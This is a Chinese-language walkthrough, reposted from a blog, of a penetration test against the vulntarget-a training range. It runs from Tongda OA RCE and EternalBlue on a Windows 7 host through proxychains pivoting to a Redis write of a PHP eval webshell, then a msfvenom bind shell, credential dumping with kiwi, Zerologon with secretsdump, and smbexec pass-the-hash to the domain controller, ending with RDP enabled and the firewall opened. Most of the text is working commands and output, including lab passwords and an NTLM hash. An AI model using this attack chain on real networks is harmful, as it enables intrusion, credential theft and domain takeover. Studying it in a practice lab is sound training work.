0


vultarget-a红日靶场全面解析(完整版)

简介

vultargeta靶场是星期五实验室公众号发布的自行设计靶场,其中涵盖了WEB渗透、主机漏洞、域漏洞、工控漏洞等等。
此靶场使用

网络结构

其靶场网络结构为

  • kali : 桥接模式
  • win7: 双网卡—桥接模式,卡2仅主机模式
  • win2019: VMnet19仅主机模式
  • win2016: 双网卡— VMnet18仅主机模式 ,VMnet19仅主机模式

win7主机通过NAT与kali机出于同一网段,且通过VMnet18接入内网与win2016VM18网卡进行通信,win2016通过网卡2VM19与DC机进行通信

信息搜集

扫描同一网段下主机ip地址

arp-scan -l

在这里插入图片描述

128为本机地址,131为win7主机ip

nmap -sS -sV 192.168.111.131

nmap扫描目标主机.注意:windows防火墙开启状态默认不允许ping检测,而linux默认是支持的,所以使用nmap探测时应使用TCP的SYN进行探测
在这里插入图片描述

根据结果可以看出目标主机开启80端口和445端口,访问网站
在这里插入图片描述
通过访问目标主机网站,可以发现该靶场使用到了通达OA系统,百度百科上这么写这:

通达OA概述与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限。 Office Anywhere采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。

WIN7漏洞利用

通达OA利用工具+中国蚁剑

上面端口扫描时发现目标机器开启445端口,首先想到利用永恒之蓝漏洞,稍后利用,先使用通达OA工具尝试攻击
点击通达OA工具可以进行下载
为了方便我将该工具源码打包成jar方便kali执行

java -jar TDOA_RCE-master.jar

首先打开通达OA工具后目标地址为靶场对外主机win7的外网ip,获取Cookie按钮后下方栏中会显示通达OA任意用户登录测试得到的Cookie一键利用,工具会自动在http://192.168.1.109/FRSJFIL.php生成木马并提供密码
在这里插入图片描述

*******
当前通达OA版本为: 11.3
正在尝试利用任意用户登录漏洞获取Cookie...
poc1利用成功
已自动填充
*******
正在尝试利用本地文件包含漏洞...
利用成功
SHELL如下:
http://192.168.111.131/VPMHKQF.php
密码:x

中国蚁剑直接连接
在这里插入图片描述
成功连接
在这里插入图片描述

进入命令端

whoami

在这里插入图片描述

永恒之蓝漏洞利用

在信息搜集环节,我们是发现被攻击主机开启443端口,所以我会想到利用永恒之蓝漏洞进行一次渗透

  • kali机打开msfconsole
  • use exploit/windows/smb/ms17_010_eternalblue
  • set rhosts 192.168.111.131
  • run在这里插入图片描述在这里插入图片描述在这里插入图片描述 成功得到通道!并且为system权限 自动迁移进程,稳固连接
run post/windows/manage/migrate 

在这里插入图片描述

输入shell 进入控制台
在这里插入图片描述

 chcp 65001

修改控制台编码,默认进入shell有些字符会乱码
在这里插入图片描述

结果信息可以看出该主机使用两张网卡,其中网卡2接入内网
查看是否存在域情况 net time /domain (同步域的时间,通过该命令返回的结果是否正常执行来判断是否存在域)
在这里插入图片描述
报错,该主机并未加入到域中,arp -a查看当前网段内其他主机信息
在这里插入图片描述

结果可以看出网卡10.0.20.98网段下有一个10.0.20.99的主机

添加路由表

win7机带有两块网卡,当kali攻击机与win7建立通信后,无法跨网段访问发送数据包到另一块网卡上,所以需要添加路由,指定下一跳的路由为另一块网卡的地址,这样便可以借助win7作跳板机操控服务器

既然已经拿到了system权限的session,那么下一步就需要设置一个路由并配置代理,方便我们从攻击机来访问内网10.0.20.xxx网段的主机

use post/multi/manage/autoroute
set session 1
run

添加后进入session中查看路由添加情况
在这里插入图片描述

sessions -i 1   # session会话id可以通过 sessions来查看
run autoroute -p

在这里插入图片描述

添加成功,继续添加代理

use auxiliary/server/socks_proxy
options
set version 4a
run
sessions -i

socks_proxy代理版本有4a和5这里我选择的是4a,socks5比4a多支持了一些协议如UDP、IPV6等,4a可以做的5也可以做到,有兴趣网上看看两者区别
在这里插入图片描述
在这里插入图片描述

jobs #  查看代理列表

在这里插入图片描述
修改

/etc/proxychains4.conf

,最后一行添加

socks4 0.0.0.0 1080

此文件为proxychains的配置文件,要与msf的options配置信息保持一致,否则是无法正常使用proxychains进行代理访问的

内网渗透

在拿到win7shell以后,通过添加路由和代理的方式使访问的请求可以进入内网网段,因为添加了代理socket 4a,通过proxychains可以使不支持代理的软件通过配置的1080端口通过win7添加的路由到内网主机。

proxychains

在linux中很多软件是不支持代理的。proxychains可以让这些软件走上代理通道,支持SOCKETS 4a、SOCKETS 5、HTTP、HTTPS
在linux中,

/etc/proxychains4.conf

文件中可以配置代理的端口和ip地址,上面配置中在

use auxiliary/server/socks_proxy

下的options中有一个参数SRVPORT默认端口为

1080

,ip为

0.0.0.0

,意味着msf监听来自任意ip1080端口数据,所以需要配置

/etc/proxychains4.conf

发送的目标端口也为1080,这样可以索引软件数据通过1080端口让msf接受到并转发到内网中

proxychains nmap -Pn -sT 10.0.20.99 -p 80,6379,8080,7001,139,22,23,3389,443,8089,3306,5432,53,67,21,20,25,1433,1512

这里只枚举了一些常用的端口,当然也可以全端口扫描,但是时间很慢,所以就挑选了一些常用端口进行探测
在这里插入图片描述
在这里插入图片描述
根据探测结果发现目标主机开启了80端口和6379redis服务,使用

proxychains firefox #注意命令不能在root用户下执行,切换到kali

在这里插入图片描述
通过proxychains代理打开firefox火狐浏览器尝试访问该网站
在这里插入图片描述
成功访问到内网网站,扫一下后台目录

proxychains dirbuster #进行文件扫描

在这里插入图片描述
因为通过代理去进行的目录扫描,所以时间会很长,但这里还是成功扫出几个文件
在这里插入图片描述
通过代理浏览器访问
在这里插入图片描述
php探针,在访问l.php发现了意外的惊喜,将网站的所有信息都呈现出来,包括版本号、phpstudy绝对路径,组件、相关参数等等。了解到网站信息后开始接下来的操作

redis未授权访问

在使用proxychains做端口扫描时发现是开启了6379端口

proxychains redis-cli-h 10.0.20.99

在这里插入图片描述
无密码成功登录,那么既然已经有了网站的绝对路径,通过redis向该目录下写文件木马

proxychains redis-cli-h 10.0.20.99
CONFIG SETdir"C:/phpStudy/PHPTutorial/WWW/"
CONFIG SET dbfilename conf.php
set 1 "<?php @eval($_POST['aa']);?>"
save

在这里插入图片描述
成功将文件写进了网站根目录,这个安全配置属实舒服,密码没加还有写文件权限,极度危险,接下来蚁剑进行连接,但是注意因为此时操作内网主机,中国蚁剑是无法直接跨越跳板机连接到内网,需要为中国蚁剑设置代理

  • 代理协议SOCKS4
  • ip:kali主机ip
  • 端口1080在这里插入图片描述

添加 http://10.0.20.99/conf.php,成功连接到内网主机,将其
在这里插入图片描述
system权限用户
在这里插入图片描述
在这里插入图片描述

  • 主机win2016
  • 域名vulntarget.com
  • 网卡两块
  • 另一块网卡ip地址 10.0.10.111
  • DNS地址10.0.10.110

上线win2016

获取win7shell之后,我们为他加了路由和代理,同时有win2016的蚁剑连接,拿win2016的shell,创建正向马,并通过代理监听

msfvenom  -p windows/x64/meterpreter/bind_tcp lport=6666 -f exe > 6666.exe

生成木马以后通过上面的蚁剑连接上传到win2016,并在命令行处执行,由于win2016开启防火墙,win7不能直接访问,所以还要添加一条6666的策略,或者直接关掉防火墙

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=6666 action=allow
#或者
netsh advfirewall set allprofiles state off #直接关闭防火墙

在这里插入图片描述

通过代理启动msf,注意只有通过代理才能使流量正向到内网win2016上,

proxychains msfconsole

在这里插入图片描述

 use exploit/multi/handler 
 set payload windows/x64/meterpreter/bind_tcp
 set rhost 10.0.20.99
 run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

成功获得shell,且为system用户
kiwi查看账户密码

load kiwi

在这里插入图片描述

creds_all

在这里插入图片描述
在这里插入图片描述
有密码

Admin#123
run post/multi/manage/autoroute  #接着创建路由

在这里插入图片描述

arp -a 查看内网有无其他主机

在这里插入图片描述
这里是看到了10.0.10.110这台主机.因为上面我们是有看到他的根域名是

vulntarget.com

,查看域控计算机名

net group"domain controllers"/domain

在这里插入图片描述
WIN2019,继续枚举域控信息

run post/windows/gather/enum_domain

在这里插入图片描述
定位到域控的ip地址,正是10.0.10.110,仅有这么一台,

arp -a

命令我们已经看到,且计算机名WIN2019,与上一步类似,添加代理,使kali主机能够访问到域控

use auxiliary/server/socks_proxy
set version 4a
set srvport 1081
options
run

在这里插入图片描述
在配置文件中最后一行追加

socks4  0.0.0.0 1081 

在这里插入图片描述
第一个为kali主机访问代理端口1080将数据发送到win2016主机,第二个其实是在基于1080继续访问代理端口1081来访问域控主机的

CVE-2020-1472利用

CVE-2020-1472影响win server2008r到win2019多个操作系统版本,只需要得到域控的用户名且能够访问到目标域控,漏洞不需要主机在域环境下,原理是通过将目标域控密码置空,根据获取的凭得到域管理员的权限。
因为拿到的是域成员,提权域控有几种常见方法,废话不多说,直接使用CVE-2020-1472,准备两个工具包:

git clone https://github.com/dirkjanm/CVE-2020-1472.git
git clone https://github.com/SecureAuthCorp/impacket.git

下载完成后,利用用cve-2020-1472漏洞将域控密码置空

proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

在这里插入图片描述
使用

secretsdump.py

尝试获取administrator域控的hash值,此文件在impacket/examples目录下

proxychains4 python3 secretsdump.py  vulntarget.com/WIN2019\[email protected]  -just-dc  -no-pass

在这里插入图片描述
成功获取

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

相同目录下使用

smbexec.py

拿域控shell

proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 [email protected]

在这里插入图片描述
成功,权限为system,开启远程桌面端口,防火墙放行3389

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"/v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

在这里插入图片描述
成功搞定,还有少了一步,破解域控密码,远程登录需要的密码,我们已经掌握了hash值,通过john工具破开
在这里插入图片描述
将hash值放入文件中
在这里插入图片描述
搞定

远程连接

proxychains rdesktop 10.0.10.110
用户名: VULNTARGET\Administrator
密码: Admin@666

激动地心颤抖的手
在这里插入图片描述
在这里插入图片描述
完成!!!如果需要shell可以上传木马程序到域控,通过msf监听

总结

这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况,是一次很好的体验

标签: web安全 linux

本文转载自: https://blog.csdn.net/weixin_45055749/article/details/127323792
版权归原作者 问心彡 所有, 如有侵权,请联系我们删除。

“vultarget-a红日靶场全面解析(完整版)”的评论:

还没有评论